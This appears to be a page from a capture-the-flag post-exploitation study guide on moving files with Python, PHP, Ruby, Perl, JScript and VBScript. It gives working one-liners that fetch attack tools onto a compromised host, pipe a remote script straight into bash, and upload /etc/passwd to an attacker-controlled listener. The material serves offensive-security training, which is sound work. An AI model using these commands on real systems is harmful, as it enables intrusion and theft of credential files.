> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/post-exploitation/file-transfers/transferring-files-with-code.md).

# Transferring files with code

## Transferring files with code

Use this page when common transfer tools are missing but a scripting runtime exists.

Most download commands run on the **compromised host**.

Most upload workflows start a listener on the **attacker** and send data from the **compromised host**.

{% hint style="info" %}
**Attacker** means your box, Pwnbox, or redirector.

**Compromised host** means the machine you already accessed.
{% endhint %}

### Python

Python works well for quick one-liners.

Use `python2.7` when Python 2 is present.

Use `python3` when Python 3 is present.

#### Python 2 download

**Compromised host — download a file with Python 2**

```bash
python2.7 -c 'import urllib; urllib.urlretrieve("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'
```

#### Python 3 download

**Compromised host — download a file with Python 3**

```bash
python3 -c 'import urllib.request; urllib.request.urlretrieve("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'
```

### PHP

PHP is common on web servers.

It gives you several clean download options.

#### `file_get_contents()` and `file_put_contents()`

**Compromised host — download a file with PHP**

```bash
php -r '$file = file_get_contents("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); file_put_contents("LinEnum.sh", $file);'
```

#### `fopen()` download

**Compromised host — stream a remote file to disk with PHP**

```bash
php -r 'const BUFFER = 1024; $fremote = fopen("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "rb"); $flocal = fopen("LinEnum.sh", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'
```

#### Pipe remote content straight to `bash`

Use this only when you trust the remote content.

**Compromised host — execute a remote script in memory**

```bash
php -r '$lines = @file("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); foreach ($lines as $line) { echo $line; }' | bash
```

{% hint style="warning" %}
The `@file()` form depends on enabled `fopen` wrappers.

Piping to `bash` executes the response immediately.
{% endhint %}

### Ruby

Ruby also supports clean one-liners.

**Compromised host — download a file with Ruby**

```bash
ruby -e 'require "net/http"; File.write("LinEnum.sh", Net::HTTP.get(URI.parse("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh")))'
```

### Perl

Perl often appears on older Linux systems.

**Compromised host — download a file with Perl**

```bash
perl -e 'use LWP::Simple; getstore("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh");'
```

### JavaScript on Windows

Windows can run JavaScript through `cscript.exe`.

Create the helper script on the **compromised host**, then execute it on the **compromised host**.

#### Create `wget.js`

**Compromised host — save this as `wget.js`**

```javascript
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), false);
WinHttpReq.Send();
var BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile(WScript.Arguments(1));
```

#### Execute `wget.js`

**Compromised host — download a file with `cscript.exe`**

```cmd
cscript.exe /nologo wget.js https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView.ps1
```

### VBScript on Windows

VBScript is present on many Windows systems.

Like the JavaScript example, create the helper script on the **compromised host** and run it on the **compromised host**.

#### Create `wget.vbs`

**Compromised host — save this as `wget.vbs`**

```vbscript
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send

with bStrm
    .type = 1
    .open
    .write xHttp.responseBody
    .savetofile WScript.Arguments.Item(1), 2
end with
```

#### Execute `wget.vbs`

**Compromised host — download a file with `cscript.exe`**

```cmd
cscript.exe /nologo wget.vbs https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView.ps1
```

### Upload files with Python 3

This workflow has two parts.

Start the upload server on the **attacker**.

Send the file from the **compromised host**.

#### Start `uploadserver`

**Attacker — start the upload server**

```bash
python3 -m uploadserver
```

Expected output:

```
File upload available at /upload
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
```

#### Upload a file with a one-liner

**Compromised host — upload a file to the attacker**

```bash
python3 -c 'import requests; requests.post("http://<attacker-ip>:8000/upload", files={"files": open("/etc/passwd", "rb")})'
```

Replace `<attacker-ip>` with your listener IP.

#### Expanded Python example

**Compromised host — same upload flow in readable Python**

```python
import requests

URL = "http://<attacker-ip>:8000/upload"
file = open("/etc/passwd", "rb")
response = requests.post(URL, files={"files": file})
```

This pattern also works in other languages.

Pick one language you are likely to find and practice it.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://capcap-1.gitbook.io/capcap/readme/ctf-modules/post-exploitation/file-transfers/transferring-files-with-code.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
